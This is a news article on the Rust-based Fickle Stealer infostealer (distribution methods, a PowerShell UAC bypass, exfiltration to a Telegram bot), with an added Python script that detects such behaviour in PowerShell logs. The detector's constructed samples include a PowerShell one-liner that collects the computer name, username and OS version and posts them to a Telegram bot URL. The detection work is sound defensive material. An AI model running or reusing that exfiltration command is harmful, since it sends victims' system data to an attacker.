New Rust-based malware targets Microsoft Windows, exploits PowerShell and steals sensitive information
Security professionals are warning about a new info stealer that is being spread over the Internet using various methods.
Fickle Stealer performs the usual tactics: steals sensitive files, system information, files stored in the browser, cryptocurrency wallet information and more, but what is somewhat unusual about Fickle Stealer is that it is built on Rust.
“In addition to some popular applications, this stealer also searches sensitive files in parent directories of common installation directories to ensure comprehensive data collection,” said security researcher Pei Han Liao. “It also receives a target list from the server, which makes Fickle Stealer more flexible.”
Avoid info stealers
Cybersecurity researchers at Fortinet FortiGuard Labs say there are four separate distribution methods for Fickle Stealer, including a VBA dropper, a VBA downloader, link downloader, and executable downloader.
Some of these methods also use a PowerShell script that bypasses the User Account Control (UAC) mechanism. The same PowerShell script sends system information such as the device’s country and city, IP address, operating system version, computer name, and username.
All data is exfiltrated to a Telegram bot.
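The two behaviours described above, a PowerShell script that profiles the host (OS version, computer name, username) and then pushes data to a Telegram bot, are exactly what a defender can hunt for in PowerShell ScriptBlockLogging (Event ID 4104). The following is an added example written for this page, not code from the article or from Fortinet's analysis: it scores script-block text for the combination of host profiling and a Telegram Bot API call. The `api.telegram.org/bot<token>/...` URL shape is the real Bot API convention; the bot token, chat id and sample events below are constructed placeholders, and the host-profiling marker set is an assumption chosen for this example.

```python
import re
from dataclasses import dataclass, field

# Telegram Bot API message/upload endpoints.  Host and path shape follow the real
# Bot API convention; the token in the constructed samples below is a placeholder.
TELEGRAM_EXFIL = re.compile(
    r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/(sendDocument|sendMessage)",
    re.IGNORECASE,
)

# PowerShell idioms that read the host identity the article says the script collects
# (OS version, computer name, username).  Assumed marker set, not from the article.
HOST_PROFILING = {
    "computer_name": re.compile(r"\$env:COMPUTERNAME", re.IGNORECASE),
    "user_name": re.compile(r"\$env:USERNAME", re.IGNORECASE),
    "os_version": re.compile(r"Win32_OperatingSystem|\[Environment\]::OSVersion", re.IGNORECASE),
}


@dataclass
class Finding:
    record_id: int
    indicators: list = field(default_factory=list)
    severity: str = "info"


def analyze_script_block(record_id: int, script: str) -> Finding:
    """Score one 4104 script-block text for infostealer-style behaviour."""
    finding = Finding(record_id)
    if TELEGRAM_EXFIL.search(script):
        finding.indicators.append("telegram_bot_api")
    for name, pattern in HOST_PROFILING.items():
        if pattern.search(script):
            finding.indicators.append(name)

    profiling = [i for i in finding.indicators if i != "telegram_bot_api"]
    if "telegram_bot_api" in finding.indicators and profiling:
        # Host fingerprint plus a messaging-API upload in the same block: the
        # pairing the article describes, and rarely legitimate on a workstation.
        finding.severity = "high"
    elif "telegram_bot_api" in finding.indicators:
        # Telegram API alone: suspicious, but some automation uses it for alerts.
        finding.severity = "medium"
    elif len(profiling) >= 2:
        # Reconnaissance alone is common in admin scripts; keep it low.
        finding.severity = "low"
    return finding


def scan_events(events):
    """Return findings of severity medium or higher for (record_id, script_text) pairs."""
    findings = (analyze_script_block(rid, text) for rid, text in events)
    return [f for f in findings if f.severity in ("medium", "high")]


# Constructed sample 4104 script-block texts (not from the article or real telemetry).
SAMPLE_EVENTS = [
    (1, "$os=(Get-CimInstance Win32_OperatingSystem).Caption; "
        "$b=\"$env:COMPUTERNAME|$env:USERNAME|$os\"; "
        "Invoke-RestMethod -Uri 'https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN/sendMessage' "
        "-Method Post -Body @{chat_id='0';text=$b}"),
    (2, "Get-ChildItem C:\\Users\\$env:USERNAME\\Documents | Measure-Object"),
    (3, "Invoke-WebRequest -Uri 'https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN/sendDocument' "
        "-Method Post -InFile report.zip"),
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding.record_id, finding.severity, finding.indicators)
```

Run against the constructed samples, record 1 scores high (profiling plus Telegram upload), record 3 scores medium (Telegram upload only), and record 2 is suppressed as ordinary admin activity. In a real deployment the same scoring would be fed from the 4104 events forwarded by your log pipeline, with the Telegram pattern complemented by a network-level allow-list for api.telegram.org on endpoints that have no business reason to reach it.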
Besides ransomware, infostealers are among the most popular and most disruptive forms of malware out there. They provide threat actors with access to sensitive services such as bank accounts, social media profiles, and corporate platforms. Furthermore, with cryptocurrency wallet data, hackers can import the information into their own wallets, essentially stealing any money they find there.
Finally, info stealers give them access to people’s email inboxes, which can then lead to phishing attacks, impersonation and identity theft, and even ransomware attacks on companies’ IT infrastructure.
Securing a device against infostealers is the same as securing it against any other form of malware: do not download and run suspicious files, and double-check every attachment in email before opening it.
Via The Hacker News